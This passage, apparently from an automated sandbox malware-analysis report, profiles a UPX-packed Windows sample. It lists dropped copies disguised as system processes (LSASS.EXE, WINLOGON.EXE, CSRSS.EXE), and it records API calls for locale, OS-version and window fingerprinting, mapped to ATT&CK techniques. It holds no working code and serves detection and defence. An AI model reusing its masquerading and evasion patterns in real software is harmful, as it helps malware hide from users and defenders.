(GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9DE16.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9DF9D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C38C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- [targetUID: 00000000-00005272]\n \"Puisi.txt\" has type \"ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9DF99.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9DE19.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005272)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00003900)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005632)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005632)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005632)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00002108)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00003136)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005272)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003900)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005632)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002108)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003136)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005500)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003220)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005308)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000944)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21be001d01be0010016e0010000dd01e414e00188000000880000001768ae779817e001ff2bae77a4658577a41be001ac011b0000001b002d001b00010000000a00000008000000c06ddd015016e0012e0016000100000082020000008edf01c06ddd01 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d76c0ca1f0000d0fd7f9a5caf7700f0fd7f50c7120044d0fd7f00000000400000003f0000002000000000d0fd7f44c71200c15caf776082b6772000000000d0fd7f9a5caf7700f0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d76f87222000070fd7f9a5caf7700f0fd7f50c712004470fd7f00000000400000003f000000200000000070fd7f44c71200c15caf776082b677200000000070fd7f9a5caf7700f0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21b4a01d01b4a0100164a0100004701e4144a0188000000880000001768ae7798174a01ff2bae775b428577a41b4a01ac0130000000300000004701c06d47011400980066050000c06d470150164a0110000000000000001500930066050000c06d4701 (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d766094340000f0fd7f9a5caf7700e0fd7f50c7120044f0fd7f00000000400000003f0000001f00000000f0fd7f44c71200c15caf776082b6771f00000000f0fd7f9a5caf7700e0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00005272)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21b5501d01b55010016550100005201e414550188000000880000001768ae7798175501ff2bae77ff428577a41b5501ac011a0000001a0000005201c06d52011200a200ab040000c06d520150165501100000000000000013009d00ab040000c06d5201 (UID: 00000000-00003900)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21b7800d01b78000016780000007500e414780088000000880000001768ae7798177800ff2bae77cf458577a41b7800ac0162000000620000007500c06d75001400980069010000c06d75005016780010000000000000001500930069010000c06d7500 (UID: 00000000-00005632)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bef01d01bef010016ef010000ec01e414ef0188000000880000001768ae779817ef01ff2bae7753398577a41bef01ac012300000023000000ec01c06dec0116008e001f000000c06dec015016ef011000000000000000170089001f000000c06dec01 (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d76a8b8280000c0fd7f9a5caf7700f0fd7f50c7120044c0fd7f00000000400000003f0000002000000000c0fd7f44c71200c15caf776082b6772000000000c0fd7f9a5caf7700f0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00002108)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a00100005a1b3a01581b3a0188153a01000037016c143a0188000000880000001768ae7720173a01ff2bae77e53785772c1b3a01ac0121000000210000003701905b37011200a20066050000905b3701d8153a01100000000000000013009d0066050000905b3701 (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21b4d01d01b4d0100164d0100004a01e4144d0188000000880000001768ae7798174d01ff2bae776d2a8577a41b4d01ac0130000000300000004a01c06d4a0114009800ab040000c06d4a0150164d01100000000000000015009300ab040000c06d4a01 (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d7668b0340000f0fd7f9a5caf7700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15caf776082b6772000000000f0fd7f9a5caf7700e0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00003136)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bb401d01bb4010016b4010000b101e414b40188000000880000001768ae779817b401ff2bae77dd298577a41bb401ac012500000025000000b101c06db10114009800d1040000c06db1015016b401100000000000000015009300d1040000c06db101 (UID: 00000000-00005500)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bc101d01bc1010016c1010000be01e414c10188000000880000001768ae779817c101ff2bae7787238577a41bc101ac013000000030000000be01c06dbe0114009800a4030000c06dbe015016c101100000000000000015009300a4030000c06dbe01 (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bb101d01bb1010016b1010000ae01e414b10188000000880000001768ae779817b101ff2bae7796248577a41bb101ac012900000029000000ae01c06dae011400980066050000c06dae015016b10110000000000000001500930066050000c06dae01 (UID: 00000000-00003220)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21b3f01d01b3f0100163f0100003c01e4143f0188000000880000001768ae7798173f01ff2bae7757188577a41b3f01ac0119000000190000003c01c06d3c011400980052010000c06d3c0150163f0110000000000000001500930052010000c06d3c01 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d7648aa1d0000f0fd7f9a5caf7700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15caf776082b6772000000000f0fd7f9a5caf7700e0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21b4e01d01b4e0100164e0100004b01e4144e0188000000880000001768ae7798174e01ff2bae771e1c8577a41b4e01ac0118000000180000004b01c06d4b0116008e009c020000c06d4b0150164e011000000000000000170089009c020000c06d4b01 (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bb201d01bb2010016b2010000af01e414b20188000000880000001768ae779817b201ff2bae7731828777a41bb201ac011800000018000000af01c06daf011400980060030000c06daf015016b20110000000000000001500930060030000c06daf01 (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bf001d01bf0010016f0010000ed01e414f00188000000880000001768ae779817f001ff2bae779b1d8577a41bf001ac016000000060000000ed01c06ded0116008e00e3010000c06ded015016f001100000000000000017008900e3010000c06ded01 (UID: 00000000-00005308)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21be801d01be8010016e8010000e501e414e80188000000880000001768ae779817e801ff2bae77440b8577a41be801ac011b0000001b000000e501c06de50116008e009c020000c06de5015016e8011000000000000000170089009c020000c06de501 (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7d7620ae1f0000a0fd7f9a5caf7700f0fd7f50c7120044a0fd7f00000000400000003f0000002000000000a0fd7f44c71200c15caf776082b6772000000000a0fd7f9a5caf7700f0fd7f68c712005789ae778083b6771317b275d8eb7d76 (UID: 00000000-00000944)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a00100005a1bb801581bb8018815b8010000b5016c14b80188000000880000001768ae772017b801ff2bae774e0885772c1bb801ac012800000028000000b501905bb5011200a20018040000905bb501d815b801100000000000000013009d0018040000905bb501 (UID: 00000000-00000932)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a0010000d21bc801d01bc8010016c8010000c501e414c80188000000880000001768ae779817c801ff2bae77050c8577a41bc801ac011f0000001f000000c501c06dc50116008e00e1010000c06dc5015016c801100000000000000017008900e1010000c06dc501 (UID: 00000000-00003276)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059ae7798010000a00100005a1bdc01581bdc018815dc010000d9016c14dc0188000000880000001768ae772017dc01ff2bae777ff985772c1bdc01ac012100000021000000d901905bd9011200a2005e030000905bd901d815dc01100000000000000013009d005e030000905bd901 (UID: 00000000-00000812)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005272)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetWindowTextA\" (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00005272)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005272)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003900)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005632)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002108)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003136)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005500)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003220)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005308)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000944)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000932)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003276)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000812)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005732)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001872)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002040)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005000)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005508)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005428)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003156)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015e001eea3a0720016e00102000000d0a11e00609ba0720c16e0017d9ba072328a9a7274c21e0097a8a072020000000000000028c21e00d0a11e000816e00194f9120094f912003ff29872f015e001c3a5a0720016e001d0a11e00c0e5967228c21e0034000000d01be0010000dd01e02fe001c0e59672d8f91200dcf91200000000004e0200009cfa120034000000340000001768ae77d81be00100000000435cae77606485770016e0012403dd010000dd015001dd0193aba07200000000c06ddd015c15e00100000000d0a11e004e02000000fa12005001dd01b7aba072 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0054db1200b3442c0005000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce212007b6e83c810e0120010e012005ecbc1761401000000000000005dbf766ce212000e5dbf7604de1200dcaac376010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f196c2c8e4db12006d820876dc731f0004010000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000640061003100340061003500350036006400320061006500330032006200340033006600380062003000350032006600310035003500300065006600640035006100340035006400380032003800630065006400360038003700320039003200300031002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bae776c588577d8eb7d76ac011b0000001b0000000000000000001c00700083010000000000000000000000000000000000001d006b0083010000000000000000000038701b0000000000200000000000000000000000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000210001000000ffffffff020000000800000010e01f0010e01f000be01f000000000002000000b88f1d0000000000010000080000000054ed120095e1aa77d48c3900feffffffccda12003f08127602000000b88f1d00000000000100001888fb1176bcda1200c81cc37692dc120095fb1176f0db1200b88f1d0000000000000000000000000078db120000001b007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002d96c2c838db12006d820876dc731f0004010000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000599c2c850d412006d8208763c65210004010000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00a4d01200b3442c00090000000000000000000000000000000000000000000000000000007c010000000000000000000000000000bcd71200cb6483c860d5120060d512005ecbc1767c01000000000000005dbf76bcd712000e5dbf7654d31200dcaac37601000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600219cc2c834d112006d820876046b210004010000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b000000001b0000000000186d210098d012000464ae7738011b00e063ae7702000000b88f1d000000000001000008d48c3900feffffffbcc7b677c0c7b6770a0000000010000000001b00f06a2100f83b0000ff07000000001b00000000007f070000c4001b0008301b009e32000048d0120067e5ab7700001b00f06a21000000000000001b00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036005d9dc2c888d012006d820876046b210004010000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000021004868210043682100000000000000000000001b0000000001d4cc12000000000038da120095e1aa77d48c3900feffffff435cae775059ae77aa000000b800000042682100406821005cce120094d21200000000000000000000000000000000000000000000000000801b000000001b001c5cad7760d8b175ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096edae776a682100a06a8475860000005cce120094d212000000000086008800a06a84755cce1200916c84756a682100a06a8475a06a8475ccd2120002020000 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000210054db1200b344450105000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce212002518d2c810e0120010e012005ecbc1761401000000000000005dbf766ce212000e5dbf7604de1200dcaac376010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360092e70ecfe4db12006d8208765c59220004010000 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005636)", "origin": "API Call", "attck_id": "T1082", 